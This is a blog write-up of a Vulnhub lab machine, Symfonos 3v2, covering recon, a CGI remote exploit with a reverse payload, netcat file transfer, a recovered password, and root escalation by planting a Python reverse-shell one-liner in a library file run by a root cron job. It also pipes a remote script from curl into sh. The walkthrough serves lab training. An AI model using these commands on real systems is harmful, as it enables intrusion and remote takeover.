Magda is Hacking Series: Symfonos Write-Up
In this article, I am sharing with you a different perspective on how to hack Symfonos: 3v2, minimizing the usage of automated tools on purpose.
The machine is hosted on Vulnhub website. Credit for this machine goes to Zayotic. Download this lab by clicking here.
The article will include:
§ Setup Details
§ Penetration Testing Methodology
§ Useful Tools and Command
§ Concept Definitions
§ Exploitation Details
I. Setup Details
The machine is easy to install with a .ova file and VMWare.
II. Penetration Testing Methodology, Useful Tools and Command
Finding the IP address is the first step to start our journey and enumerating. My machine IP address is 192.168.111.139.
Let’s discover what is happening currently, and what can we find with some enumeration. I use autorecon and nmap.
Nmap gives me quickly a result with a port FTP open, and a ProFTPD:
All versions of ProFTPD including 1.3.5b are affected by a remote code execution vulnerability with an arbitrary file copy flaw in the mod_copy module, part of the default installation of ProFTPD and enabled by default.
I didn’t wait for the autorecon results, I ams lightly impatient today.
Google found some good stuff on this FTP version:
Let’s give it a try.
python3 exploit_mags.py — host 192.168.111.139 — port 21 — path “/var/www/html/”
I need to find more information as the exploit needs login crededentials, and I am unsure about the path but …
But let,s check more, nice picture on the port 80:
And then after running dirb command another one:
DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. I most commonly use dirb but dirbuster is fast and multi-threads, which is important if time is critical.
I will just run another dirbuster again — I feel there is a hint with the gate 😊 :
Well, I was right…
The underworld folder seems full of treasures …
I check it out, and this is what I see:
Let’s get a Google search now:
As usual, we see several results, so let’s try on Exploit-db:
The exploit is in python, and is addressing a vulnerability that is called mod_cgi remote exploit:
./exploit_magggs.py payload=reverse rhost=192.168.111.139 lhost=192.168.111.131 lport=1234
And it is not running ….
Forgot to add the right page here, which is underworld:
python exploit_magggs.py payload=reverse rhost=192.168.111.139 lhost=192.168.111.131 lport=1234 pages=http://192.168.111.139/cgi-bin/underworld/
Ran the command again, and the result is the below — we have the user — YaaY
Let’s run a privilege escalation python script now.
We simply use wget https://www.securitysift.com/download/linuxprivchecker.py and of course upload it to the tmp folder as we can write there with no issues:
It is a php7.0 version:
Well, I have tried a few things, including sudo su etc and it didn’t work. The password for config files, and smtp neither.
I am not always using tcpdump, but read somewhere recently, so I will give it a try:
pcap files are data files created using the program and they contain the packet data of a network. The files are mainly used in analyzing the network characteristics of a certain data. The tcpdump was giving me some issues, as running on frontend, so I added & to run it in the background.
After finding creating the file.pcap, I needed to send it to my machine, and run it with wireshark.
On the sending machine:
nc -w 3 192.168.111.131 4445 < file.pcap
On my machine:
nc -l -p 4445 > file.pcap
First attempt, nothing so checked file size and looked it.
Second attempt was successful:
I have found the password for hades — PTpZTfU4vxgzvRBE
Amazing below screenshot, right ? :D Don’t judge me on my late night hacking please :D !
Well, at least I got the right typing at the end .. Haha …
python -c 'import pty; pty.spawn("/bin/sh")'hades — PTpZTfU4vxgzvRBE
Again, priv esc and I found ONLY writable files, no executables. We need to find a writable file, that we can change to get a reverse shell…
find / -writable -type d 2>/dev/null # world-writeable folders
Writable yes but not executable is the result, so I think cronjobs, right?
Let’s see what cronjobs are scheduled, so perhaps they are executed as root.
§ 17 * * * * root cd / && run-parts — report /etc/cron.hourly
§ 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts — report /etc/cron.daily )
§ 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts — report /etc/cron.weekly )
§ 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts — report /etc/cron.monthly )
This basically tells us that in our case, run-parts run all scripts in the folder /etc/cron.hourly
But we can’t write in the con_hourly folder either ….After some research, I needed to find another way in, and I found this tool: pspy - unprivileged Linux process snooping. I did not use this one before, and it took me some time before finding the way forward.pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems.You can find it here: https://github.com/DominicBreuker/pspyI run the below command:
./pspy32 -pf -i 1000
We see the below:2020/07/15 12:02:01 CMD: UID=0 PID=19660 | /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py after cron -fThere's code in the kernel which explicitly checks for uid 0 when needing to check for the root user, which means that root always has at least uid 0.We see that the cronjob runs every minute as per below:
Here I got stuck …
I couldn’t write into the file as hades… And, I stumbled…
After my call for help on Twitter, I had an amazing TIP from my new WONDERFUL mentor… I wanted to root this machine by myself so did not want spoilers 😊Started with running linpeas.sh again first with:curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | shThe only way forward seemed to be the ftpclient.py.Cat ftpclient.py and we see the below:
The only way to make a change would be by using the lib ftplib ! as we have seen that we can write php2.7 folder as hades.
Let’s go:
cd /usr/lib/python2.7
Let’s add a reverse shell to the ftplib.py — well by doing so, I actually overwrote the file, and needed to reboot the machine, as it failed. So, remember to always copy the file before making changes…
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.111.131”, 4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
When you run ftplib.py source file, the python interpreter first looks to see if any ‘ftplib.pyc’ (which is the byte-code compiled version of ‘ftplib.py’) exists, and if it is more recent than ‘ftplib.py’. If so, the interpreter runs it. If it does not exist, or ‘ftplib.py’ is more recent than it, the interpreter first compiles ‘ftplib.py’ to ‘ftplib.pyc’.
There is one exception to the above example. If you put ‘#! /usr/bin/env python’ on the first line of ‘ftplib.py’, make it executable, and then run ‘ftplib.py’ by itself. But, I did the other way, and identified which function is executed first in ftpclient.py and that was the function login.
That it is !
Downloaded locally the file with:
scp hades@192.168.111.140:/usr/lib/python2.7/ftplib.py .
Then, I made some changes as per below, including my reverse shell:
Then, uploaded back to the machine via:
scp ./ftplib.py hades@192.168.111.140:/usr/lib/python2.7/ftplib.py
Well, the first time made a mistake in the syntax, so I needed to correct it as per below:
Then it worked, and with nc -lvp 4445 on the other command prompt, I was listening 😊 …
And rooted … Woop, woop
This was an excellent machine, really liked it.
Disclaimer
My blogs are for informational and educational purposes only. The articles, blogs, videos, examples and all information is only for those who are interested to learn about Ethical Hacking, Security, and Penetration Testing. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. I do not promote, encourage, support or excite any illegal activity or hacking without written permission in general.
Who am I ?
I am a keynote speaker, a serial entrepreneur and a senior cyber security expert. I am currently leading the cyber business for an international Fortune 500 insurance-broking firm in Asia.
I am a strong activist for women in security, and I founded the Women of Security Singapore Chapter (WoSEC), supporting female professionals in the industry.
I am a member of the Advisory Board for the Executive Summit at Black Hat Asia, and I am the co-founder of Responsible Cyber Pte. Ltd., a Singapore-based start-up with NUS Enterprise, the entrepreneurial arm of the National University of Singapore, and Singtel Innov8, the venture capital arm of the Singtel Group, as its shareholders. The company has been valued at 7 Million SGD in May 2020.
I have a PhD in Telecommunication Engineering issued by Telecom SudParis and speak fluently 5 languages.
My research topics have been focusing on Cyber Security, the future of localisation and positioning, education and more. My writings around cybersecurity have been featured by IEEE, RSA Conference, CYBERSEC, World Congress on Internet Security (WorldCIS-2016), CYBER RISK LEADERS Magazine, among others.
I speak about cybersecurity in general with a focus on cyber risk management, hacking and diversity and inclusion in the field.
I welcome you to watch some of my insights on Channel News Asia for a Documentary on the Dark Web (at 18:09mn approx): https://www.channelnewsasia.com/news/video-on-demand/the-dark-web
Follow me on Social Media:
- LinkedIn: https://www.linkedin.com/in/m49d4ch3lly/
- Facebook: https://www.facebook.com/m49d4ch3ly/
- Twitter: https://twitter.com/m49D4ch3lly
- Instagram: https://www.instagram.com/m49d4ch3lly/
